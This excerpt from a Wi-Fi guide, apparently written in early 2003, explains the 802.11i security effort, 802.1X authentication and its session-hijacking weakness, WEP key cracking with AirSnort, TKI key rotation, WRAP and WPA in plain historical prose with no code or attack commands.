802.11k | Jeff Duntemanns Drive-By Wi-Fi Guide

802.11i

Wireless Equivalent Privacy (WEP) was broken in August 2001 by a team at AT&T Labs, based on work published earlier that same month by Scott Fluhrer, Itsik Mantin, and Adi Shamir. (The paper by Fluhrer, Mantin, and Shamir was actually about a flaw in the cryptographic algorithm used by WEP and was not itself an attack on WEP.) Ever since then, security has been the Big Honking Problem with wireless networking.

Earlier, in March of 2001, the IEEE formed the 802.11i task group to attempt to standardize security in wireless LANs. This was prior to the cracking of WEP, but many thought even before the crack that WEP was at best a bare minimum security technology. For example, WEP does nothing to prevent the several legitimate clients connected to a wireless network from monitoring one another's traffic. WEP protects only against outsiders who have not yet connected. The same key is used to encrypt all traffic coming into or going out of a single access point, so all connected clients must have the same key-hence there is no privacy at all among the clients.

Concerns like this led to the task group's creation, but as yet nothing has been approved, though a draft is circulating now in early 2003. The general approach to 802.11 security has two layers: 802.1X authentication and a WEP fix called Temporal Key Integrity (TKI).

802.1X Authentication

A good part of the 802.11i task group's mission is to seamlessly incorporate support for 802.1X authentication into the greater 802.11 standard. Although the callouts are confusingly similar, 802.1X is not a part of the 802.11 standard. The IEEE 802.1 standard is separate from 802.11, and specifies general management mechanisms for both wired and wireless networks. The 802.1X sub-standard lays out an authentication framework that defines a challenge-response method of determining whether a client is authorized to associate with an access point. The standard additionally provides a way for the client to determine if the access point is in fact 'real' and not a hacker emulating an access point as a security attack called 'the man in the middle.'

One of the challenges in using 802.1X authentication is that it requires a fair amount of centralized administration, including an authentication server program running somewhere on the network to which the access point is connected. In a corporate LAN this isn't a problem. In a home office or small office environment, however, it could be a showstopper.

Nor is 802.1X authentication completely hack-proof. A peculiar attack called 'session hijacking' was published by University of Maryland researchers William Arbaugh and Arunesh Mishra in February 2002. The attack is difficult to describe briefly, but it involves 'race conditions' in timing between the authentication server and the wireless access points that use it. Unless the timing of establishing and breaking associations with wireless clients is exquisitely managed, hackers can break in and hijack a session with neither the client nor the access point (and thus the authentication server) realizing that anything is amiss.

This problem is a timing problem, and is due to the fact that 802.1X authentication is currently 'stateless.' A fix has been proposed that will make 802.1X a 'state machine' and eliminate the session hijacking attack.

WEP Key Management with TKI

One of the things that WEP lacks is effective automatic key management. Because keys are set manually and changed only when the network administrator decides to change them (again, manually), WEP keys do not change very often.This is especially true in larger organizations where there are many users and lots of laptops floating around, not always in places where they can be easily found. When a given key is used for too long, it becomes vulnerable to cracking, because the ability to crack a key depends on the number of packets intercepted that had been encrypted using that key. If a hacker with a packet sniffer utility intercepts a large enough number of packets encrypted with the same key, utilities like AirSnort can crack the key.

In lightly used networks (like those used in home offices) it takes a long time to gather enough packets to crack WEP; in some cases a month or more. (This is why WEP is relatively secure for home network use, contrary to conventional wisdom.) But in heavily used corporate networks where an access point is basically moving packets continuously, without pause, an AirSnort attack can succeed in as little as five hours.

The whole idea of intelligent key management is to link renewal of keys to the volume of packets sent through a given wireless access point. If the keys are changed before enough traffic moves through the access point to allow an AirSnort attack, the attack is foiled and AirSnort has to begin packet sniffing again from scratch. There is a performance burden inherent in replacing keys frequently, but the hope of TKI is to renew a wireless network's keys just often enough to prevent a packetgathering sniffer attack. Ongoing research will refine our understanding of how often keys will need to be changed, but at the moment it looks like every 10,000 packets or so.

TKI also adds an additional security touch by encrypting something called the WEP initialization vector, which makes AirSnort-type attacks even more difficult.

Once the TKI mechanism is fully defined and the 802.11i standard approved, access point and client adapter firmware will have to be upgraded for TKI to work-but TKI would appear to be our best near-term bet for fixing the gaping hole in WEP security.

Ultimately, WEP will have to be abandoned entirely. There are far more secure wireless network encryption systems on the drawing boards. WEP's eventual heir is likely to be the Wireless Robust Authentication Protocol (WRAP), which is based on the extremely secure AES encryption mechanism. As WRAP will be completely incompatible with WEP, it will probably require a whole new generation of wireless hardware.

802.11i is still being actively debated, and it's unlikely that firmware upgrades or new products will appear before mid to late-2003. In the meantime, the Wi-Fi Alliance (formerly WECA) has developed tests for a subset of 802.11i that may be implemented in firmware without changes to existing Wi-Fi certified hardware. This program is called Wi-Fi Protected Access (WPA) and was released in the fall of 2002. The Wi-Fi Alliance feared that a tidal wave of bad publicity on Wi-Fi security would damage the acceptance of Wi-Fi in corporate IT shops. (These were not groundless fears!) WPA-compliant devices should become available in the first quarter of 2003 or very soon after.